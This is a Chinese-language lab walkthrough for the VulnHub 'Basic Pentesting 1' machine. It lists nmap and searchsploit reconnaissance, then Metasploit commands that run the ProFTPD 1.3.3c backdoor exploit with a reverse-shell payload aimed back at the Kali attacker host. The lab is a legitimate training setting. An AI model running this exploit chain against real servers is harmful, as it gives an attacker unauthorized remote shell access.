综合实战第一章
ftp系实战
环境准备
靶场下载:https://www.vulnhub.com/entry/basic-pentesting-1,216/
攻击机:
kali 192.168.3.134
win7 192.168.3.137
靶机:BASIC_PENTESTING_1 192.168.3.174
信息搜集
nmap扫描
nmap -p- -A 192.168.3.174
发现有21,22,80端口
看到了proftpd,可以看看有没有现成漏洞
搜索漏洞库
searchsploit ProFTPD 1.3.3c
漏洞利用
打开msf,搜索相关漏洞
msfconsole
search ProFTPD 1.3.3c
看到有个后门漏洞
使用这玩意
use exploit/unix/ftp/proftpd_133c_backdoor
show options
设置参数
set rhosts 192.168.3.174
修改payload
set payload cmd/unix/reverse
set lhost 192.168.3.134
exploit